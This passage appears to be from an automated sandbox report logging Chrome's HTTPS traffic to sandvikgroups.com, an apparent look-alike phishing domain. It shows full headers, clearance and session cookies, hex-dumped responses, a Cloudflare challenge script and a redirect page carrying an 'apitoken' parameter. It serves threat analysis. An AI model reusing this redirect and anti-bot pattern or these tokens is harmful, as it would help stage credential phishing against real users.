                                        Data Ascii: o4EOOkSK0UJ89fqr5UxwFqFDOVVIzRk7cJ.8vDnTas_dLXcNN0i.vnJyXQkLLjlM8Pjhz6GxyRj4FaRZDjeRRf4eXm48osQd4fB.m29__bj6raDzHlOW46Rv3sJmC5Nyp.glr.2GwgPqCPOfFhG9NLV7pBXfHmGGrDp1fXo.lDL2TmFdbnxJtuoXIvQYfGUR6I99jn6CEQWn6h9vUOcoyIizEvQr5IScw3WFvnqfOrBHzTqi6JsCL4j8Ylh5oMH
                                        2025-01-07 21:06:17 UTC1369INData Raw: 4d 39 72 39 31 76 49 48 64 4d 5f 57 77 70 37 6f 63 79 43 72 38 4e 71 5a 58 69 70 68 41 58 6b 41 45 55 36 54 4d 57 4a 66 39 68 6b 2e 34 48 6d 76 76 69 61 67 43 33 5f 4f 34 33 66 35 51 34 57 43 5f 6b 71 38 68 6d 35 46 45 67 67 53 54 54 42 53 68 6e 6d 6a 49 71 51 67 31 62 39 79 39 57 57 52 64 6c 6f 32 71 63 4a 53 4d 5a 64 33 4f 33 57 36 6b 76 74 46 79 50 4c 46 66 7a 72 77 4c 61 49 57 34 31 5f 58 31 36 67 39 76 55 79 50 37 54 62 49 6e 35 57 67 4a 44 67 4d 4d 49 69 36 4a 59 5f 79 6c 7a 55 53 42 53 53 66 7a 5a 33 45 4d 4f 62 47 62 5f 74 68 66 48 70 30 69 6d 4f 4f 6b 6a 68 4e 4d 2e 48 62 32 43 54 7a 50 30 37 47 33 65 6d 78 5f 64 7a 32 37 56 73 51 75 65 52 44 51 78 4c 64 2e 4b 68 68 4c 75 6b 67 42 76 4c 45 49 30 58 32 6a 6d 58 64 51 45 34 46 79 75 2e 42 6b 5f 44
                                        Data Ascii: M9r91vIHdM_Wwp7ocyCr8NqZXiphAXkAEU6TMWJf9hk.4HmvviagC3_O43f5Q4WC_kq8hm5FEggSTTBShnmjIqQg1b9y9WWRdlo2qcJSMZd3O3W6kvtFyPLFfzrwLaIW41_X16g9vUyP7TbIn5WgJDgMMIi6JY_ylzUSBSSfzZ3EMObGb_thfHp0imOOkjhNM.Hb2CTzP07G3emx_dz27VsQueRDQxLd.KhhLukgBvLEI0X2jmXdQE4Fyu.Bk_D
                                        2025-01-07 21:06:17 UTC1369INData Raw: 46 33 4a 53 5a 58 6c 47 39 68 66 32 32 57 4a 34 79 4e 59 79 57 64 57 33 76 71 63 54 50 53 54 47 43 37 50 5f 51 45 34 55 72 33 37 44 46 31 31 78 54 75 52 41 7a 64 67 69 63 32 6f 51 6e 2e 47 71 4a 71 4a 4a 52 4b 4c 5a 30 58 56 47 6f 6d 4b 70 35 47 2e 70 4b 36 52 57 32 41 56 50 78 72 56 30 6b 2e 56 65 39 52 35 39 65 4d 6d 55 31 53 5a 39 69 37 55 78 54 66 70 65 32 48 70 52 64 53 50 58 61 77 68 6b 50 74 57 55 4a 46 5f 4a 78 54 73 76 32 79 47 61 75 31 59 6a 35 54 75 4d 66 57 55 4c 74 32 72 58 34 49 78 56 70 41 64 6d 7a 54 56 36 59 38 45 58 4d 45 6e 4d 55 31 6c 5a 66 31 62 4a 64 6e 33 51 64 76 43 61 41 50 4c 34 4d 42 5f 62 62 79 48 4b 78 7a 41 54 4d 4e 32 71 2e 59 36 45 41 30 52 6c 48 32 79 63 6b 64 6d 58 35 4c 74 6a 46 79 72 4c 39 36 58 77 6d 69 6a 76 4b 43 44
                                        Data Ascii: F3JSZXlG9hf22WJ4yNYyWdW3vqcTPSTGC7P_QE4Ur37DF11xTuRAzdgic2oQn.GqJqJJRKLZ0XVGomKp5G.pK6RW2AVPxrV0k.Ve9R59eMmU1SZ9i7UxTfpe2HpRdSPXawhkPtWUJF_JxTsv2yGau1Yj5TuMfWULt2rX4IxVpAdmzTV6Y8EXMEnMU1lZf1bJdn3QdvCaAPL4MB_bbyHKxzATMN2q.Y6EA0RlH2yckdmX5LtjFyrL96XwmijvKCD
                                        2025-01-07 21:06:17 UTC400INData Raw: 5f 6f 70 74 2e 63 4f 67 55 51 75 65 72 79 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 3b 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 22 5c 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 5f 5f 63 66 5f 63 68 6c 5f 72 74 5f 74 6b 3d 44 53 52 55 37 4c 65 31 57 31 6e 4f 37 42 75 79 48 74 58 53 59 39 4a 37 35 33 6a 67 73 4e 67 71 79 6b 38 64 6f 69 41 46 41 58 63 2d 31 37 33 36 32 38 33 39 37 37 2d 31 2e 30 2e 31 2e 31 2d 63 5a 72 4d 2e 34 30 34 35 35 32 63 4b 75 70 61 77 63 6b 42 73 47 79 45 72 56 4f 31 42 69 34 79 61 41 34 45 56 2e 56 46 78 67 6f 22 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 29 3b 63 70 6f 2e 6f 6e 6c 6f
                                        Data Ascii: _opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null, "\/favicon.ico?__cf_chl_rt_tk=DSRU7Le1W1nO7BuyHtXSY9J753jgsNgqyk8doiAFAXc-1736283977-1.0.1.1-cZrM.404552cKupawckBsGyErVO1Bi4yaA4EV.VFxgo" + window._cf_chl_opt.cOgUHash);cpo.onlo
                                        2025-01-07 21:06:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        33192.168.2.449796188.114.96.34435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:19 UTC1911OUTPOST /?cono HTTP/1.1
                                        Host: sandvikgroups.com
                                        Connection: keep-alive
                                        Content-Length: 22
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        ifrFpYBqq2prsJtyijUzZP3NnQ: 26262131
                                        sec-ch-ua-arch: "x86"
                                        sec-ch-ua-platform-version: "10.0.0"
                                        X-Requested-with: XMLHttpRequest
                                        sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                        sec-ch-ua-bitness: "64"
                                        sec-ch-ua-model: ""
                                        sec-ch-ua-platform: "Windows"
                                        X-Requested-TimeStamp-Expire:
                                        sec-ch-ua-mobile: ?0
                                        X-Requested-TimeStamp-Combination:
                                        X-Requested-Type-Combination: GET
                                        Content-type: application/x-www-form-urlencoded
                                        sec-ch-ua-full-version: "117.0.5938.132"
                                        X-Requested-Type: GET
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        X-Requested-TimeStamp:
                                        Accept: */*
                                        Origin: https://sandvikgroups.com
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://sandvikgroups.com/?cono
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: cf_clearance=QM.MuetOShSYHUUxhvhqs8aE1tL0MSRSQdvVjfAEaaw-1736283956-1.2.1.1-ObYB.GVCdQwIutt9keZWdlW2OQPyI4jxD0b0VbSfU9Jtg08Q1Q_TS5p5jQru14FMfWGDNtbuahqWXbbNyHp_B0G79CjpmYBMMHTnSLHSqcOVYbCPzWrh5.h1dGG40P9OEY3cwNFW4SK1tQS_FIW..tNEt5CTmWv_UIQfNfhA9h1jX_7V4ggBxwXqaNp7JFd8jQ10qkWn6sAA2Ghd0kViYwPRr1QYJp4QGBEasr7Nbj5N7uUBvjEeXS_VliYSinJHh_t7FhKbW0S6D8ZKoTVpmdHqYtUpnVPtwiquH7dtfSowpG6_Mw5PjVAz7m3kXY8iSHSYBggvaVcsRJvTwyEAn6Wd0iZXLvIHyMAviJqzsjgCczOZwAj2agCz9U..YSiXu.e9SG2avYw1.tBX26vJQm72lA8CW_MUCGUuNHA..rhphR7el16l4ogfU9oQpol9; D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA
                                        2025-01-07 21:06:19 UTC22OUTData Raw: 6e 61 6d 65 31 3d 48 65 6e 72 79 26 6e 61 6d 65 32 3d 46 6f 72 64
                                        Data Ascii: name1=Henry&name2=Ford
                                        2025-01-07 21:06:19 UTC1322INHTTP/1.1 204 No Content
                                        Date: Tue, 07 Jan 2025 21:06:19 GMT
                                        Connection: close
                                        X-Content-Type-Options: nosniff
                                        X-Content-Type-Options: nosniff
                                        X-XSS-Protection: 1; mode=block
                                        X-XSS-Protection: 1; mode=block
                                        Set-Cookie: Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA; path=/; expires=Wed, 08-Jan-25 21:06:16 GMT; Max-Age=86400;
                                        Set-Cookie: 2vr6FJpXLImaYDnK6ye90Ul8Pls=1736283976; path=/; expires=Wed, 08-Jan-25 21:06:16 GMT; Max-Age=86400;
                                        Set-Cookie: qP8z4g21VQWXI8KiIvcj2au0iXk=1736370376; path=/; expires=Wed, 08-Jan-25 21:06:16 GMT; Max-Age=86400;
                                        Set-Cookie: vXuI3jpYYO0XVdaNbL1zCBWkGQQ=uEfxLxDx4TmObmcF6RTOrtYCeIc; path=/; expires=Wed, 08-Jan-25 21:06:16 GMT; Max-Age=86400;
                                        X-Frame-Options: SAMEORIGIN
                                        Cache-Control: public, max-age=0 no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Pragma: no-cache
                                        Expires: 0
                                        X-Server-Powered-By: Engintron
                                        cf-cache-status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Aaf0%2FYVDYABBbTf1jO9tTAFbQOibFcgj98I29kP2og8nnn8Ol867TViFN1KtyURHrbuXdksZ4egQjeNfeW%2FubdWWs37waYvnxXqHBd13xlp8dvoU5fTMKLnv4MnKgKPUtBWRhA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8fe6e935dc424207-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-07 21:06:19 UTC216INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 37 32 37 26 6d 69 6e 5f 72 74 74 3d 31 37 32 33 26 72 74 74 5f 76 61 72 3d 36 35 35 26 73 65 6e 74 3d 34 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 34 33 26 72 65 63 76 5f 62 79 74 65 73 3d 32 35 37 37 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 36 35 39 30 39 30 26 63 77 6e 64 3d 31 38 33 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 32 34 30 65 37 62 61 31 30 36 31 37 61 38 61 30 26 74 73 3d 32 38 31 26 78 3d 30 22 0d 0a 0d 0a
                                        Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1727&min_rtt=1723&rtt_var=655&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=2577&delivery_rate=1659090&cwnd=183&unsent_bytes=0&cid=240e7ba10617a8a0&ts=281&x=0"


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        34192.168.2.449795188.114.96.34435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:19 UTC1313OUTGET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1
                                        Host: sandvikgroups.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: script
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: cf_clearance=QM.MuetOShSYHUUxhvhqs8aE1tL0MSRSQdvVjfAEaaw-1736283956-1.2.1.1-ObYB.GVCdQwIutt9keZWdlW2OQPyI4jxD0b0VbSfU9Jtg08Q1Q_TS5p5jQru14FMfWGDNtbuahqWXbbNyHp_B0G79CjpmYBMMHTnSLHSqcOVYbCPzWrh5.h1dGG40P9OEY3cwNFW4SK1tQS_FIW..tNEt5CTmWv_UIQfNfhA9h1jX_7V4ggBxwXqaNp7JFd8jQ10qkWn6sAA2Ghd0kViYwPRr1QYJp4QGBEasr7Nbj5N7uUBvjEeXS_VliYSinJHh_t7FhKbW0S6D8ZKoTVpmdHqYtUpnVPtwiquH7dtfSowpG6_Mw5PjVAz7m3kXY8iSHSYBggvaVcsRJvTwyEAn6Wd0iZXLvIHyMAviJqzsjgCczOZwAj2agCz9U..YSiXu.e9SG2avYw1.tBX26vJQm72lA8CW_MUCGUuNHA..rhphR7el16l4ogfU9oQpol9; D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA
                                        2025-01-07 21:06:19 UTC917INHTTP/1.1 302 Found
                                        Date: Tue, 07 Jan 2025 21:06:19 GMT
                                        Content-Length: 0
                                        Connection: close
                                        location: /cdn-cgi/challenge-platform/h/g/scripts/jsd/849bfe45bf45/main.js?
                                        cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=10800, public
                                        access-control-allow-origin: *
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UfN7SKA7AqVRXrDudGMn%2BNOU84RNrHoijZXs6hEeifZmk1bn9DJTBTo75RwqoD%2BwnGMsX0Tntda9rsSSURS2qF5HJ27YOd3OSF7M5VL9vcjC8KLYIy5FvjFaIs2XeaUmQ4CJzg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8fe6e936184befa7-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1990&min_rtt=1982&rtt_var=760&sent=3&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1891&delivery_rate=1425085&cwnd=161&unsent_bytes=0&cid=a59b49714be6b048&ts=138&x=0"


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        35192.168.2.449799188.114.96.34435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:20 UTC1888OUTGET /?cono HTTP/1.1
                                        Host: sandvikgroups.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-full-version: "117.0.5938.132"
                                        sec-ch-ua-arch: "x86"
                                        sec-ch-ua-platform: "Windows"
                                        sec-ch-ua-platform-version: "10.0.0"
                                        sec-ch-ua-model: ""
                                        sec-ch-ua-bitness: "64"
                                        sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-Dest: document
                                        Referer: https://sandvikgroups.com/?cono
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: cf_clearance=QM.MuetOShSYHUUxhvhqs8aE1tL0MSRSQdvVjfAEaaw-1736283956-1.2.1.1-ObYB.GVCdQwIutt9keZWdlW2OQPyI4jxD0b0VbSfU9Jtg08Q1Q_TS5p5jQru14FMfWGDNtbuahqWXbbNyHp_B0G79CjpmYBMMHTnSLHSqcOVYbCPzWrh5.h1dGG40P9OEY3cwNFW4SK1tQS_FIW..tNEt5CTmWv_UIQfNfhA9h1jX_7V4ggBxwXqaNp7JFd8jQ10qkWn6sAA2Ghd0kViYwPRr1QYJp4QGBEasr7Nbj5N7uUBvjEeXS_VliYSinJHh_t7FhKbW0S6D8ZKoTVpmdHqYtUpnVPtwiquH7dtfSowpG6_Mw5PjVAz7m3kXY8iSHSYBggvaVcsRJvTwyEAn6Wd0iZXLvIHyMAviJqzsjgCczOZwAj2agCz9U..YSiXu.e9SG2avYw1.tBX26vJQm72lA8CW_MUCGUuNHA..rhphR7el16l4ogfU9oQpol9; D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA; 2vr6FJpXLImaYDnK6ye90Ul8Pls=1736283976; qP8z4g21VQWXI8KiIvcj2au0iXk=1736370376; vXuI3jpYYO0XVdaNbL1zCBWkGQQ=uEfxLxDx4TmObmcF6RTOrtYCeIc
                                        2025-01-07 21:06:21 UTC1194INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 21:06:21 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        X-Content-Type-Options: nosniff
                                        X-Content-Type-Options: nosniff
                                        X-XSS-Protection: 1; mode=block
                                        X-XSS-Protection: 1; mode=block
                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Pragma: no-cache
                                        Set-Cookie: PHPSESSID=ac667dfa18e02e513ed41eabccae044c; path=/
                                        X-Nginx-Upstream-Cache-Status: MISS
                                        X-Server-Powered-By: Engintron
                                        cf-cache-status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wlIE4kMw2%2BbTPA9EMIP7YFsb13c23U7B5IdbAS%2BCt0r6jlSAX67ygBDJA9EUpBF7tY8Rd4sIw7XOx%2FYNj0CsBM90j5Tk0X0KB%2BykxyqnGhXA9NytDz1PNDNhB5iHn3BLrY3i3g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8fe6e93cdace0f7c-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1698&min_rtt=1698&rtt_var=849&sent=5&recv=8&lost=0&retrans=1&sent_bytes=4226&recv_bytes=2510&delivery_rate=252246&cwnd=231&unsent_bytes=0&cid=9536efe2e9af606e&ts=1107&x=0"
                                        2025-01-07 21:06:21 UTC175INData Raw: 35 33 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 09 3c 68 65 61 64 3e 0a 09 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 20 75 72 6c 3d 22 3f 61 75 74 68 26 61 70 69 74 6f 6b 65 6e 3d 71 72 64 30 66 67 32 68 78 39 65 7a 37 72 72 22 3e 0a 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74
                                        Data Ascii: 53e<!DOCTYPE HTML><html lang="en-US"><head><meta charset="UTF-8"><meta http-equiv="refresh" content="0; url="?auth&apitoken=qrd0fg2hx9ez7rr"><script type="t
                                        2025-01-07 21:06:21 UTC1174INData Raw: 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 09 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 3f 61 75 74 68 26 61 70 69 74 6f 6b 65 6e 3d 71 72 64 30 66 67 32 68 78 39 65 7a 37 72 72 22 0a 09 09 09 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 2f 68 65 61 64 3e 0a 09 09 3c 62 6f 64 79 3e 0a 09 09 09 49 66 20 79 6f 75 20 61 72 65 20 6e 6f 74 20 72 65 64 69 72 65 63 74 65 64 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 2c 20 66 6f 6c 6c 6f 77 20 74 68 69 73 20 3c 61 20 68 72 65 66 3d 22 3f 61 75 74 68 26 61 70 69 74 6f 6b 65 6e 3d 71 72 64 30 66 67 32 68 78 39 65 7a 37 72 72 22 3e 4c 69 6e 6b 3c 2f 61 3e 2e 0a 09 09 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20
                                        Data Ascii: ext/javascript">window.location.href = "?auth&apitoken=qrd0fg2hx9ez7rr"</script></head><body>If you are not redirected automatically, follow this <a href="?auth&apitoken=qrd0fg2hx9ez7rr">Link</a>.<script>(function(){function c(){var
                                        2025-01-07 21:06:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        36192.168.2.449800188.114.96.34435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:20 UTC1331OUTGET /cdn-cgi/challenge-platform/h/g/scripts/jsd/849bfe45bf45/main.js? HTTP/1.1
                                        Host: sandvikgroups.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: script
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: cf_clearance=QM.MuetOShSYHUUxhvhqs8aE1tL0MSRSQdvVjfAEaaw-1736283956-1.2.1.1-ObYB.GVCdQwIutt9keZWdlW2OQPyI4jxD0b0VbSfU9Jtg08Q1Q_TS5p5jQru14FMfWGDNtbuahqWXbbNyHp_B0G79CjpmYBMMHTnSLHSqcOVYbCPzWrh5.h1dGG40P9OEY3cwNFW4SK1tQS_FIW..tNEt5CTmWv_UIQfNfhA9h1jX_7V4ggBxwXqaNp7JFd8jQ10qkWn6sAA2Ghd0kViYwPRr1QYJp4QGBEasr7Nbj5N7uUBvjEeXS_VliYSinJHh_t7FhKbW0S6D8ZKoTVpmdHqYtUpnVPtwiquH7dtfSowpG6_Mw5PjVAz7m3kXY8iSHSYBggvaVcsRJvTwyEAn6Wd0iZXLvIHyMAviJqzsjgCczOZwAj2agCz9U..YSiXu.e9SG2avYw1.tBX26vJQm72lA8CW_MUCGUuNHA..rhphR7el16l4ogfU9oQpol9; D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA
                                        2025-01-07 21:06:20 UTC898INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 21:06:20 GMT
                                        Content-Type: application/javascript; charset=UTF-8
                                        Content-Length: 8721
                                        Connection: close
                                        cache-control: max-age=14400, stale-if-error=10800, stale-while-revalidate=10800, public
                                        x-content-type-options: nosniff
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fRN4b5qsD4BOQEOQB29D72Co05t3pY8tYzqW8qEbe9ktmVLEP6TfhM9xr89cS31CAbl9ASeqGgpvIqFfJ%2BkSi53OBl4sl6ksWmvPkAxq16UpmX9klTX%2F7uLMD2jBY%2BDccb4pRw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8fe6e93eca354314-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1632&min_rtt=1631&rtt_var=615&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1909&delivery_rate=1775075&cwnd=188&unsent_bytes=0&cid=fead2c2451333f35&ts=319&x=0"
                                        2025-01-07 21:06:20 UTC471INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 46 50 57 76 3a 27 67 27 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 57 2c 68 2c 69 2c 6a 2c 6f 2c 73 2c 7a 2c 41 29 7b 57 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 56 2c 65 2c 66 29 7b 66 6f 72 28 56 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 56 28 35 30 36 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 56 28 35 31 32 29 29 2f 32 2b 70 61 72 73 65 49 6e 74 28 56 28 35 35 36 29 29 2f 33 2a 28 70 61 72 73 65 49 6e 74 28 56 28 35 31 35 29 29 2f 34 29 2b 2d 70 61 72 73 65 49 6e 74 28 56 28 35 31 30 29 29 2f 35 2b 70 61 72 73 65 49 6e 74 28 56 28 35 33 32 29 29 2f 36 2b 2d 70 61 72 73 65 49 6e 74 28 56 28 35 31 38 29 29 2f 37 2a 28 2d 70 61 72
                                        Data Ascii: window._cf_chl_opt={cFPWv:'g'};~function(W,h,i,j,o,s,z,A){W=b,function(c,d,V,e,f){for(V=b,e=c();!![];)try{if(f=-parseInt(V(506))/1+-parseInt(V(512))/2+parseInt(V(556))/3*(parseInt(V(515))/4)+-parseInt(V(510))/5+parseInt(V(532))/6+-parseInt(V(518))/7*(-par
                                        2025-01-07 21:06:20 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 45 29 7b 72 65 74 75 72 6e 20 45 3d 3d 6e 75 6c 6c 3f 27 27 3a 65 2e 67 28 45 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 46 2c 59 29 7b 72 65 74 75 72 6e 20 59 3d 62 2c 59 28 35 30 39 29 5b 59 28 34 39 34 29 5d 28 46 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 2c 47 2c 5a 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 2c 50 2c 51 2c 52 2c 53 2c 54 2c 55 29 7b 69 66 28 5a 3d 58 2c 45 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 49 3d 7b 7d 2c 4a 3d 7b 7d 2c 4b 3d 27 27 2c 4c 3d 32 2c 4d 3d 33 2c 4e 3d 32 2c 4f 3d 5b 5d 2c 50 3d 30 2c 51 3d 30 2c 52 3d 30 3b 52 3c 45 5b 5a 28 35 36 38 29 5d 3b 52 2b 3d 31 29 69 66 28 53 3d 45 5b 5a 28 34 39 34 29 5d 28 52 29 2c 4f 62 6a 65 63 74 5b 5a 28 35 36 33 29 5d 5b 5a
